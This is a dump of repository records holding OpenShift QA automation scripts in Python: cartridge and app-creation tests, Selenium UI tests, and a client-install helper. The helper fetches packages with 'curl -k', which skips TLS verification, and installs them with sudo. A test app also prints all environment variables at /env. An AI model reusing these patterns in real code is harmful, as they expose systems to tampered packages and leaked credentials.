OpenShiftTestSuite(conf)\n    suite.add_test(CreateAppWithoutSSHKey)\n    return suite\n\ndef run(conf):\n    suite = get_suite(conf)\n    suite()\n\n#\n# end of case_174360.py\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5703051090240479, "alphanum_fraction": 0.5769109725952148, "avg_line_length": 41.9594612121582, "blob_id": 
"62aa5a9900f06d9d87409d7834ea9b68518bd955", "content_id": "c55499ccdebfc289ce1a5b732febbb961d46b443", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3179, "license_type": "no_license", "max_line_length": 219, "num_lines": 74, "path": "/automation/open/testmodules/RT/cartridge/app_template/mongodb/python-3.3/application", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\nimport os\nimport commands\nfrom cgi import escape\nfrom urlparse import parse_qs\nimport pymongo3\n\nvirtenv = os.environ['OPENSHIFT_HOME_DIR'] + 'python-3.3/virtenv/'\nos.environ['PYTHON_EGG_CACHE'] = os.path.join(virtenv, 'lib/python3.3/site-packages')\nvirtualenv = os.path.join(virtenv, 'bin/activate_this.py')\ntry:\n execfile(virtualenv, dict(__file__=virtualenv))\nexcept IOError:\n pass\n#\n# IMPORTANT: Put any additional includes below this line. If placed above this\n# line, it's possible required libraries won't be in your searchable path\n# \n\ndef application(environ, start_response):\n parameters = parse_qs(environ.get('QUERY_STRING', ''))\n ctype = 'text/plain'\n #con = pymongo.Connection('mongodb://#user:#passwd@#host:#port')\n #db = con['#dbname']\n con = pymongo.Connection(os.environ['OPENSHIFT_MONGODB_DB_URL'])\n db = con[os.envrion['OPENSHIFT_APP_NAME']]\n\n coll = db['info']\n if environ['PATH_INFO'] == '/health':\n response_body = \"1\"\n elif environ['PATH_INFO'] == '/env':\n response_body = ['%s: %s' % (key, value)\n for key, value in sorted(environ.items())]\n response_body = '\\n'.join(response_body)\n elif environ['PATH_INFO'] == '/insert':\n if 'size' in parameters:\n size = int(escape(parameters['size'][0]))\n else:\n size = 500000\n for i in range(size):\n doc = {\"data\" : \"This is testing data for testing snapshoting and restoring big data in mongodb database.This is testing data for testing snapshoting and restoring big data in mongodb database.\"}\n coll.insert(doc)\n response_body = '''Gear DNS: %s\n%s records have been inserted into mongodb\\n''' % (os.environ['OPENSHIFT_GEAR_DNS'], size)\n elif environ['PATH_INFO'] == '/delete':\n coll.remove()\n response_body = 'Gear DNS: %s\\nAll the records have been deleted from mongodb database\\n' % (os.environ['OPENSHIFT_GEAR_DNS'])\n elif environ['PATH_INFO'] == '/show':\n response_body = 'Gear DNS: %s\\n' % (os.environ['OPENSHIFT_GEAR_DNS'])\n count = coll.count()\n if count <= 0:\n response_body += 'There is no record in database\\n'\n else:\n doc = coll.find_one()\n response_body += \"There are %d records in database\\nHere's one record: %s\" % (count, str(doc['data']))\n else:\n ctype = 'text/plain'\n response_body = 'Welcome to OpenShift'\n\n con.close()\n status = '200 OK'\n response_headers = [('Content-Type', ctype), ('Content-Length', str(len(response_body)))]\n #\n start_response(status, response_headers)\n return [response_body]\n\n#\n# Below for testing only\n#\nif __name__ == '__main__':\n from wsgiref.simple_server import make_server\n httpd = make_server('localhost', 8051, application)\n # Wait for a single request, serve it and quit.\n httpd.handle_request()\n" }, { "alpha_fraction": 0.6655779480934143, "alphanum_fraction": 0.6678500175476074, "avg_line_length": 54.015625, "blob_id": "e0d35f40cfef822a05c3ae8024f35daae861ef3b", "content_id": "dd2e7346e234bd97676f2d34ef590685720809cf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7042, "license_type": "no_license", 
"max_line_length": 155, "num_lines": 128, "path": "/automation/open/testmodules/UI/web/tc_platformoverview.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.common.exceptions import NoSuchElementException\nimport unittest, time, re\nimport baseutils\nimport config\nimport HTMLTestRunner\n\n\nclass PlatformOverview(unittest.TestCase):\n\n def setUp(self):\n self.driver = \"\"\n self.base_url = \"\"\n self.profile = \"\"\n self.binary= \"\"\n self.verificationErrors = []\n baseutils.initiate(self)\n\n def test_check_platform_a_overview_never_signin(self):\n baseutils.go_to_platformoverview(self)\n self.driver.delete_cookie(\"_rhc_session\")\n self.driver.delete_cookie(\"rh_sso\")\n self.driver.delete_cookie(\"prev_login\")\n self.driver.refresh()\n# baseutils.click_element_by_link_text(self,\"EXPRESS\")\n baseutils.scroll_bar(self)\n baseutils.click_element_by_xpath(self,\"//*[@id='express']/h2/a\")\n baseutils.check_title(self,\"OpenShift by Red Hat | Express\")\n baseutils.go_back(self)\n baseutils.click_element_by_xpath_no_wait(self,\"//*[@id='flex']/header/h2/a\")\n baseutils.check_title(self,\"OpenShift by Red Hat | Flex\")\n baseutils.go_back(self)\n# baseutils.click_element_by_xpath_no_wait(self,\"//*[@id='power']/header/h2/a\")\n# baseutils.check_title(self,\"OpenShift by Red Hat | Power\")\n# baseutils.go_back(self)\n# baseutils.scroll_bar(self)\n# baseutils.click_element_by_xpath(self,\"//li[@id='express']/div/a\")\n# baseutils.check_title(self,\"OpenShift by Red Hat | Platform Features\")\n# baseutils.go_back(self)\n# baseutils.scroll_bar(self)\n# baseutils.click_element_by_xpath(self,\"//li[@id='flex']/div/a\")\n# baseutils.check_title(self,\"OpenShift by Red Hat | Platform Features\")\n# baseutils.go_back(self)\n# baseutils.scroll_to_upper(self)\n# baseutils.assert_contain_text_by_xpath(self,\"//div[@id='user_box']/div/h2\",\"Don't have an OpenShift account\")\n baseutils.click_element_by_link_text(self,\"Create account\")\n baseutils.assert_element_present_by_id(self,\"web_user_email_address\")\n baseutils.click_element_by_css(self,\"#signup > a.close_button > img\")\n baseutils.click_element_by_link_text(self,\"...or sign in\")\n baseutils.assert_element_present_by_id(self,\"login_input\")\n baseutils.click_element_by_css(self,\"a.close_button > img\")\n baseutils.assert_text_equal_by_css(self,\"POPULAR OPENSHIFT VIDEOS\",\"#videos > header > h1\")\n baseutils.click_element_by_link_text(self,\"Watch more videos\")\n baseutils.check_title(self,\"Videos | Red Hat OpenShift Community\")\n baseutils.go_back(self)\n baseutils.assert_element_present_by_xpath(self,\"//*[@id='retweets']/ul/li[*]/a/img\")\n baseutils.assert_element_present_by_xpath(self,\"//*[@id='retweets']/ul/li[*]/p\")\n baseutils.assert_element_present_by_xpath(self,\"//*[@id='buzz']/a\")\n if config.proxy:\n baseutils.click_element_by_xpath(self,\"//*[@id='buzz']/a\")\n time.sleep(5)\n baseutils.check_title(self,\"Red Hat OpenShift (openshift) on Twitter\")\n\n def test_check_platform_b_overview_videos_links(self):\n baseutils.go_to_platformoverview(self)\n baseutils.scroll_bar(self)\n baseutils.click_element_by_css(self,\"img[alt=\\\"OpenShift Appcelerator Demo\\\"]\")\n baseutils.check_title(self,\"OpenShift by Red Hat | Watch Deploying Mobile Apps on OpenShift with Appcelerator\")\n baseutils.go_back(self)\n baseutils.scroll_to_upper(self)\n baseutils.click_element_by_link_text(self,\"Mobile App 
Deployment to Express w/ Appcelerator\")\n baseutils.check_title(self,\"OpenShift by Red Hat | Watch Deploying Mobile Apps on OpenShift with Appcelerator\")\n baseutils.go_back(self)\n baseutils.scroll_to_upper(self)\n baseutils.click_element_by_css(self,\"img[alt=\\\"OpenShift Flex Product Tour\\\"]\")\n baseutils.check_title(self,\"OpenShift by Red Hat | Watch OpenShift Flex Product Tour\")\n baseutils.go_back(self)\n baseutils.scroll_to_upper(self)\n baseutils.click_element_by_link_text(self,\"OpenShift Flex Product Tour\")\n baseutils.check_title(self,\"OpenShift by Red Hat | Watch OpenShift Flex Product Tour\")\n baseutils.go_back(self)\n baseutils.scroll_to_upper(self)\n baseutils.click_element_by_css(self,\"img[alt=\\\"Deploying to OpenShift PaaS with the eXo Cloud IDE\\\"]\")\n baseutils.check_title(self,\"OpenShift by Red Hat | Watch Deploying to OpenShift PaaS with the eXo cloud IDE\")\n baseutils.go_back(self)\n baseutils.scroll_to_upper(self)\n baseutils.click_element_by_link_text(self,\"Deploying to OpenShift PaaS with the eXo Cloud IDE\")\n baseutils.check_title(self,\"OpenShift by Red Hat | Watch Deploying to OpenShift PaaS with the eXo cloud IDE\")\n\n def test_check_platform_c_overview_signed_in_out(self):\n baseutils.go_to_home(self)\n baseutils.go_to_signin(self)\n baseutils.login(self,config.granted_user[0],config.granted_user[1])\n time.sleep(20)\n baseutils.go_to_platformoverview(self)\n baseutils.scroll_bar(self)\n baseutils.click_element_by_xpath(self,\"//li[@id='express']/div/a\")\n baseutils.assert_text_equal_by_css(self,\"Control Panel\",\"section.main > header > h1\",\"Control Panel is not equal here\")\n baseutils.go_back(self)\n# baseutils.scroll_bar(self)\n# baseutils.assert_contain_text_by_css(self,\"Open\",\"#flex > div.content > a.more\")\n baseutils.logout(self)\n baseutils.click_element_by_link_text(self,\"Platform Overview\")\n baseutils.scroll_to_upper(self)\n# baseutils.assert_contain_text_by_css(self,\"Compare features\",\"a.more\")\n# baseutils.assert_contain_text_by_xpath(self,\"Compare features\",\"//li[@id='flex']/div/a\")\n baseutils.assert_text_equal_by_xpath(self,\"Sign in to OpenShift\",\".//*[@id='user_box']/div/h2\")\n baseutils.click_element_by_link_text(self,\"Click here to reset your password\")\n# while (not baseutils.assert_element_present_by_css(self,\"#reset_password > header > h1\")):\n# baseutils.click_element_by_link_text(self,\"Click here to reset your password\")\n# baseutils.assert_text_equal_by_css(self,\"Reset your password\",\"#reset_password > header > h1\",\"Reset your password is not equal to the text here\")\n# baseutils.click_element_by_xpath(self,\"//div[@id='reset_password']/a/img\")\n baseutils.click_element_by_link_text(self,\"Click here to register\")\n time.sleep(4)\n baseutils.assert_element_present_by_id(self,\"web_user_email_address\")\n# baseutils.click_element_by_css(self,\"#signup > a.close_button > img\")\n \n\n def tearDown(self):\n self.driver.quit()\n if len(self.verificationErrors)==1:\n self.assertEqual([''], self.verificationErrors)\n else:self.assertEqual([], self.verificationErrors)\n \n\nif __name__ == \"__main__\":\n unittest.main()\n" }, { "alpha_fraction": 0.5750662088394165, "alphanum_fraction": 0.5799551606178284, "avg_line_length": 36.181819915771484, "blob_id": "302b4e1024a00fd8b42ce96f3ec99a356cdb367d", "content_id": "2a0d275fbb321bce489a9b219ce00ac35b924df8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4909, "license_type": 
"no_license", "max_line_length": 170, "num_lines": 132, "path": "/automation/open/testmodules/RT/cartridge/embed_mysql_to_jboss.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\nMichal Zimen\[email protected]\nApr 04, 2012\n[rhc-cartridge] embed MySQL instance to JBossAS application\nhttps://tcms.engineering.redhat.com/case/???/\n\"\"\"\nimport os\n\nimport common\nimport OSConf\nimport rhtest\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.summary = \"[rhc-cartridge] embed MySQL instance to an JBossAS application\"\n self.app_type = common.app_types[\"jbossas\"]\n self.app_name = \"jboss4mysql\"\n self.mysql_v = common.cartridge_types['mysql']\n common.env_setup()\n\n def finalize(self):\n pass\n\nclass EmbedMysqlToJboss(OpenShiftTest):\n def test_method(self):\n self.add_step(\"Create a JBoss app\", common.create_app, \n function_parameters=[self.app_name, \n self.app_type, \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd],\n expect_description = \"the app should be created successfully\",\n expect_return=0)\n \n self.add_step(\"Embed mysql to the app\", \n common.embed,\n function_parameters=[self.app_name, \n \"add-\" + common.cartridge_types['mysql']],\n expect_description=\"the mysql cartridge should be embedded successfully\",\n expect_return=0)\n\n def config_app(app_name):\n cmd = \"\"\"cd %s && sed -i '/MysqlDS\"/ {s/false/true/}' .openshift/config/standalone.xml; git commit -a -m 'changes' && git push\"\"\"%self.app_name\n (status, output) = common.command_getstatusoutput(cmd)\n return 0\n\n self.add_step(\"Modify JBoss \", \n config_app,\n function_parameters = [self.app_name],\n expect_description = \"The config file should be modified successfully\",\n expect_return = 0)\n\n def add_page(app_name):\n new_page = \"\"\"<%@ page contentType=\"text/html\" language=\"java\" import=\"java.sql.*\" %>\n<%@ page import=\"javax.naming.*\" %>\n<%@ page import=\"javax.sql.*\" %>\n<%\nInitialContext ctx = new InitialContext();\nDataSource ds = (DataSource) ctx.lookup(\"java:jboss/datasources/MysqlDS\");\nConnection connection=ds.getConnection();\nStatement statement = connection.createStatement();\nstatement.executeUpdate(\"DROP TABLE IF EXISTS ucctalk\");\nstatement.executeUpdate(\"CREATE TABLE ucctalk (speaker CHAR(30), title CHAR(60))\");\nstatement.executeUpdate(\"INSERT INTO ucctalk (speaker,title) VALUES ('Jeremy Zawodny', 'Optimizing MySQL'), ('Sanja Byelkin', 'Sub-Queries in MySQL'), ('Tim Bunce', 'Advanced Perl DBI')\");\nResultSet rs = statement.executeQuery(\"SELECT * FROM ucctalk\");\nResultSetMetaData rmeta = rs.getMetaData();\nint numColumns=rmeta.getColumnCount();\nwhile(rs.next()) {\nout.print(rs.getString(1));\nout.print(\", \");\nout.print(rs.getString(2));\nout.print(\"<br>\");\n}\nout.print(\"<br>\");\nrs.close();\nstatement.close();\nconnection.close();\n%>\"\"\"\n new_filename = \"src/main/webapp/mysql.jsp\"\n f = open(\"%s/%s\"%(self.app_name, new_filename), \"w\")\n f.write(new_page)\n f.close()\n cmd = \"cd %s; git add %s && git commit -a -m 'changes' && git push\"%(self.app_name, new_filename)\n (status, output) = common.command_getstatusoutput(cmd)\n return status\n\n self.add_step(\"Create a page which does some operation with \"\n \"mysql database under ./src/main/webapp , like mysql.jsp:\",\n add_page,\n function_parameters = [self.app_name],\n expect_description = \"The page should be added without errros\",\n expect_return = 0)\n\n def verify(app_name):\n 
url = OSConf.get_app_url(self.app_name)\n            return common.grep_web_page(url+\"/mysql.jsp\", \n                                        'Jeremy', \n                                        \"-H 'Pragma: no-cache' -L\", 5, 6)\n    \n\n        self.add_step(\"Verify the MySQL functionality...\",\n                      verify,\n                      function_parameters = [self.app_name],\n                      expect_description = \"The MySQL data should be displayed on the page without errors\",\n                      expect_return = 0)\n\n        self.add_step(\"Remove embedded mysql from the app\", \n                      common.embed,\n                      function_parameters = [self.app_name, \n                                             \"remove-\" + common.cartridge_types['mysql']],\n                      expect_description = \"the mysql cartridge should be removed successfully\",\n                      expect_return = 0)\n\n        self.run_steps()\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n    pass\n\ndef get_suite(conf):\n    suite = OpenShiftTestSuite(conf)\n    suite.add_test(EmbedMysqlToJboss)\n    return suite\n\ndef run(conf):\n    suite = get_suite(conf)\n    suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5924646854400635, "alphanum_fraction": 0.6031396985054016, "avg_line_length": 33.989009857177734, "blob_id": "8511fd15fa1b5b8b8382e6764838e63fcd77dda5", "content_id": "3450464b18db5f61bfca8b9d16353ca3da04b74a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3185, "license_type": "no_license", "max_line_length": 167, "num_lines": 91, "path": "/automation/open/testmodules/RT/cartridge/php_sqlite_support.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\"\"\"\nJiangtao Zhao\[email protected]\nFeb 10, 2012\n[rhc-cartridge]PHP sqlite Support\nhttps://tcms.engineering.redhat.com/case/122284/\n\"\"\"\nimport os,sys,re,time\n\nimport testcase,common,OSConf\nimport rhtest\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\n\nclass OpenShiftTest(rhtest.Test):\n    INTERACTIVE = False\n\n    def initialize(self):\n        self.summary = \"[rhc-cartridge]PHP sqlite Support\"\n        self.app_name = \"phpsqlite\"\n        self.app_type = common.app_types[\"php\"]\n        self.git_repo = \"./%s\" % (self.app_name)\n        tcms_testcase_id=122284\n        self.steps_list = []\n\n        common.env_setup()\n\n    def finalize(self):\n        os.system(\"rm -rf %s\"%(self.app_name))\n\nclass PhpSqliteSupport(OpenShiftTest):\n\n    def test_method(self):\n        # 1.Create an app\n        self.steps_list.append(testcase.TestCaseStep(\"1. Create a php app: %s\" % (self.app_name),\n            common.create_app,\n            function_parameters=[self.app_name, self.app_type, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd],\n            expect_description=\"the app should be created successfully\",\n            expect_return=0))\n\n        # 2.Make some change to the git repo\n        cmd = \"cd %s/php && mkdir db && touch db/test && rm -f index.php\" % (self.git_repo)\n        self.steps_list.append(testcase.TestCaseStep(\"2.Make some change to the git repo\",\n            cmd,\n            expect_description=\"Successfully touched test and removed index.php\",\n            expect_return=0))\n\n        # 3.Copy app template to the git repo and git push\n        cmd = \"cp %s/app_template/php-sqlite.template %s/php/index.php && cd %s && git add . 
&& git commit -am t && git push\" %(WORK_DIR, self.git_repo, self.git_repo)\n self.steps_list.append(testcase.TestCaseStep(\"3.Copy app template to the git repo and git push\",\n cmd,\n expect_description=\"Copy and git push succeed\",\n expect_return=0))\n\n # 4.Check app via browser\n test_html = \"done\"\n self.steps_list.append(testcase.TestCaseStep(\"4.Check the app via browser\",\n common.grep_web_page,\n function_parameters=[OSConf.get_app_url_X(self.app_name), \n test_html, \"-H 'Pragma: no-cache'\", 5, 9],\n expect_description=\"'%s' should be found in the web page\" % (test_html),\n expect_return=0))\n\n case = testcase.TestCase(self.summary, self.steps_list)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed()\n if case.testcase_status == 'FAILED':\n return self.failed()\n if case.testcase_status == 'ERROR':\n return self.incomplete()\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(PhpSqliteSupport)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.48075973987579346, "alphanum_fraction": 0.48865318298339844, "avg_line_length": 38.735294342041016, "blob_id": "5e968406dc9ea71b1fcc7b1f9b86b9b7277358c3", "content_id": "bad63068be8010d6bc7813011a81d69bdd9753cb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4054, "license_type": "no_license", "max_line_length": 97, "num_lines": 102, "path": "/automation/open/testmodules/RT/c9/create_app_with_subaccount.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n#\n# File name: create_app_with_subaccount.py\n# Date: 2012/08/31 13:49\n# Author: [email protected]\n#\n\nimport common\nimport rhtest\n\n\nclass OpenShiftTest(rhtest.Test):\n ITEST = [\"DEV\"]\n\n def initialize(self):\n self.info(\"create_app_with_subaccount.py\")\n try:\n self.test_variant = self.get_variant()\n except:\n self.test_variant = 'php'\n self.info(\"VARIANT: %s\"%self.test_variant)\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n self.sub_account = common.getRandomString(10)+\"@redhat.com\"\n self.sub_domain = common.getRandomString(10)\n self.app_name = common.getRandomString(10)\n common.env_setup()\n\n\n def finalize(self):\n pass\n\n\nclass CreateAppWithSubaccount(OpenShiftTest):\n def test_method(self):\n self.info(\"Setting up C9 environment\")\n ret = common.setup_c9_environment()\n self.assert_equal(ret, 0, \"Error during setup C9 environment\")\n ############################################\n ############################################\n self.info(\"Creating a sub domain\")\n ret = common.create_subdomain(self.sub_domain,\n self.sub_account,\n self.user_email,\n self.user_passwd)\n self.assert_equal(ret, 0, \"Error during create subaccount/subdomain\")\n ############################################\n ############################################\n self.info(\"Adding ssh key for subaccount\")\n (ret, output) = common.add_sshkey4sub_account(self.sub_account)\n self.assert_equal(0, ret, \"Unable to add sshkey for subaccount:%s\"%output)\n ############################################\n ############################################\n self.info(\"Creating an app under 
sub_account[%s]\"%self.sub_account)\n (ret, app_output) = common.create_app_using_subaccount(self.sub_domain,\n self.sub_account,\n self.app_name,\n common.app_types[self.test_variant],\n self.user_email,\n self.user_passwd)\n self.assert_equal(ret, 0, \"Error creating app under subaccount/subdomain: %s\"%app_output)\n ############################################\n ############################################\n self.info(\"Getting source by git clone\")\n cmd = \"git clone %s \"%(app_output['data']['git_url'])\n (status, output) = common.command_getstatusoutput(cmd, quiet=True)\n self.assert_equal(0, status, \"Unable to do git clone...%s\"%output)\n ############################################\n ############################################\n self.info(\"SSH to the app\")\n cmd = \"ssh %s ls -l\"%(app_output['data']['ssh_url'].replace(\"ssh://\",\"\"))\n (status, output) = common.command_getstatusoutput(cmd, quiet=True)\n self.assert_equal(0, status, \"Unable to ssh to app...%s\"%output)\n self.assert_true((output.find(self.test_variant) >= 0), \"Unable to ssh to the app.\")\n ############################################\n ############################################\n self.info(\"Checking app's web page\")\n url = app_output['data']['app_url']\n status = common.grep_web_page(url, \"OpenShift\")\n self.assert_equal(0, status, \"Error checking app's web page.\")\n\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(CreateAppWithSubaccount)\n return suite\n\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of create_app_with_subaccount.py \n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5929408073425293, "alphanum_fraction": 0.601187527179718, "avg_line_length": 34.046241760253906, "blob_id": "88d8439366428a8db908bf45f9519af73c63b373", "content_id": "0c1615c95c65fcea37b9c9ae2beb21468459f1f1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6063, "license_type": "no_license", "max_line_length": 96, "num_lines": 173, "path": "/automation/open/lib/setup_client.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n#\n# Helper script for updating RHC clients based on OS\n#\n# [email protected]\n#\n\nimport os\nimport sys\nimport re\nimport fcntl\nfrom helper import *\n\n\nBASE_REPO_HOST='https://mirror.openshift.com/'\nURL = { \"gem\": {\"candidate\": \"/libra/rhel-6-libra-candidate/client/gems/\",\n \"stage\": \"/libra/rhel-6-libra-stage/client/gems/\"},\n \"yum\": {\"candidate\": \"/libra/rhel-6-libra-candidate/x86_64/Packages/\",\n \"stage\": \"/libra/rhel-6-libra-stage/x86_64/Packages/\"}}\nCERT=os.environ['RHTEST_HOME']+'/etc/client-cert.pem'\nKEY=os.environ['RHTEST_HOME']+'/etc/client-key.pem'\n\nCONFIG={\n \"Fedora18\": 'gem',\n \"Fedora17\": 'gem',\n \"Debian\": 'gem',\n \"Ubuntu\": 'gem',\n \"Fedora16\": 'yum',\n \"RedHat\": 'yum'}\n\nif os.getuid() == 0:\n need_sudo=\"\"\nelse:\n need_sudo=\"sudo\"\n\n\ndef fetch_rhc_client_file(file_name, branch):\n if file_name.endswith(\".gem\"):\n method = \"gem\"\n elif file_name.endswith(\".rpm\"):\n method = \"yum\"\n url = BASE_REPO_HOST + URL[method][branch] + file_name\n dst_file = os.path.expanduser(\"~/%s\" % (file_name))\n cmd = 'curl -3 -f -# -k --cert %s --key %s %s --output %s'%(CERT, KEY, url, dst_file)\n attempts=3\n log.info(\"Fetching %s from 
branch %s\" % (file_name, branch))\n for a in range(0,attempts):\n (status, output) = cmd_get_status_output(cmd, quiet=True)\n\n if status!=0:\n continue\n else:\n break\n if status!=0:\n log.error(\"CMD=\"+cmd)\n log.error(output)\n return (status, dst_file)\n\ndef install_rhc_client_file(file_name):\n if not os.path.exists(file_name):\n raise Exception(\"client file %s doesn't exist\"%file_name)\n log.info(\"Going to install %s\" % (file_name))\n if file_name.endswith(\".gem\"):\n _gem_install_rhc_client_file(file_name)\n elif file_name.endswith(\".rpm\"):\n _yum_install_rhc_client_file(file_name)\n\ndef _gem_install_rhc_client_file(file_name):\n if detect_os() in (\"Ubuntu\", \"Debian\"):\n cmd = \"%s gem uninstall -ax rhc ; %s gem install %s\" % (need_sudo, need_sudo, file_name)\n else:\n cmd = \"gem uninstall -ax rhc ; gem install %s\" % (file_name)\n (status, output) = cmd_get_status_output(cmd)\n if status == 0:\n log.info(\"rhc client gem file %s successfully installed\" % (file_name))\n else:\n log.info(output)\n return status\n\ndef _yum_install_rhc_client_file(file_name):\n global need_sudo\n cmd = \"%s yum remove -y rhc ; %s yum localinstall -y %s\" % (need_sudo, need_sudo, file_name)\n (status, output) = cmd_get_status_output(cmd)\n if status == 0:\n log.info(\"rhc client rpm file %s successfully installed\" % (file_name))\n else:\n log.info(output)\n return status\n\n\ndef _yum_install_rhc_client_from_repo():\n global need_sudo\n cmd = \"rpm -q rhc && %s yum update -y rhc || %s yum install -y rhc\" % (need_sudo, need_sudo)\n (status, output) = cmd_get_status_output(cmd)\n if status == 0:\n log.info(\"rhc client is successfully installed\")\n else:\n log.info(output)\n return status\n\ndef get_current_rhc_version():\n cmd = \"rhc --version\"\n (status, output) = cmd_get_status_output(cmd)\n if status == 0:\n match = re.search(r'(?<=rhc )[\\d\\.]+', output)\n if match:\n return match.group(0)\n else:\n log.error(\"Failed to get the current version of rhc client in the output\")\n log.error(output)\n return None\n else:\n log.info(\"rhc client isn't installed\")\n return None\n\ndef get_latest_rhc_release(branch):\n method = CONFIG[detect_os()]\n log.info(\"Finding latest client version from %s...\"%(branch))\n url = BASE_REPO_HOST + URL[method][branch]\n cmd = 'curl -3 --retry 3 -f -# -k --cert %s --key %s %s'%(CERT, KEY, url)\n (status, output) = cmd_get_status_output(cmd, quiet=True)\n if status!=0:\n raise Exception(\"Unable to get the list of rhc: %s\"%output)\n latest_version = [0,0,0]\n pattern = re.compile(r'(?<=<a href=\")rhc-(\\d+)\\.(\\d+)\\.(\\d+).*?(\\.gem|\\.rpm)')\n for match in pattern.finditer(output):\n for i in range(3):\n if int(match.group(i+1)) > latest_version[i]:\n latest_version = [int(match.group(1)), int(match.group(2)), int(match.group(3))]\n if latest_version == [0,0,0]:\n raise Exception(\"Failed to get the latest version of rhc client\")\n latest_version = map(str, latest_version)\n return '.'.join(latest_version)\n\ndef get_rhc_filename_by_release(release, branch):\n method = CONFIG[detect_os()]\n url = BASE_REPO_HOST + URL[method][branch]\n cmd = 'curl -3 --retry 3 -f -# -k --cert %s --key %s %s'%(CERT, KEY, url)\n (status, output) = cmd_get_status_output(cmd, quiet=True)\n if status!=0:\n raise Exception(\"Unable to get the list of rhc: %s\"%output)\n if release == None:\n release = get_latest_rhc_release(branch)\n pattern = re.compile(r'(?<=<a href=\")rhc-%s.*?(\\.gem|\\.rpm)' % (release))\n match = pattern.search(output)\n if match:\n return 
match.group(0)\n    else:\n        raise Exception(\"Failed to get rhc client file name\")\n\n\ndef do_setup(release, branch, yum_install):\n    log.info(\"release: %s, branch: %s\" % (release, branch))\n    current_version = get_current_rhc_version()\n    if yum_install:\n        return _yum_install_rhc_client_from_repo()\n\n    if release == None:\n        log.info(\"No rhc version specified. Going to use the latest one\")\n        target_version = get_latest_rhc_release(branch)\n    else:\n        target_version = release\n    if current_version == target_version:\n        log.info(\"The required rhc client %s has already been installed\" % (target_version))\n        return 0\n    else:\n        file_name = get_rhc_filename_by_release(target_version, branch)\n        (status, file_path) = fetch_rhc_client_file(file_name, branch)\n        if status != 0:\n            raise Exception(\"Failed to fetch rhc file. Version: %s\" % (target_version))\n        else:\n            install_rhc_client_file(file_path)\n    return 0\n" }, { "alpha_fraction": 0.6510903239250183, "alphanum_fraction": 0.6619937419891357, "avg_line_length": 15.461538314819336, "blob_id": "040ffc52d5dfbf361443c191a1ebcaea364e88c0", "content_id": "efdc5a99f914e6757c3fa13ec4f5ddf6a04b734a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 642, "license_type": "no_license", "max_line_length": 43, "num_lines": 39, "path": "/automation/open/testmodules/Collections/Demo/demo_03.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n\"\"\"\n\"\"\"\nimport rhtest\nimport database\nimport time\n\nimport random\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\n\nclass OpenShiftTest(rhtest.Test):\n\n    def initialize(self):\n        self.msg = self.config.msg\n\n    def finalize(self):\n        pass\n\n\nclass Demo03(OpenShiftTest):\n    def test_method(self):\n        self.info(\"This is demo03\")\n        time.sleep(3)\n        return self.passed(\"test passed.\")\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n    pass\n\ndef get_suite(conf):\n    suite = OpenShiftTestSuite(conf)\n    suite.add_test(Demo03)\n    return suite\n\ndef run(conf):\n    suite = get_suite(conf)\n    suite()\n" }, { "alpha_fraction": 0.5314861536026001, "alphanum_fraction": 0.5390428304672241, "avg_line_length": 19.850000381469727, "blob_id": "42d2499cb4a4878198930680176c497f4962cf74", "content_id": "f60c800c47f5e00f811c06a8cdbfadbdd6d98369", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 794, "license_type": "no_license", "max_line_length": 81, "num_lines": 40, "path": "/automation/open/lib/Common/File.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\n\"\"\"\nimport re\n\n\ndef write(fpath, content, flags='w'):\n    fp = open(fpath, flags)\n    fp.write(content)\n    fp.close()\n\n\ndef append(fpath, content):\n    write(fpath, \"\\n\"+content, 'a')\n\n\ndef read(fpath):\n    f = open(fpath, 'r')\n    c = f.read()\n    f.close()\n    return c\n\n\ndef sub(fpath, pattern2repl, count=0, flags=0):\n    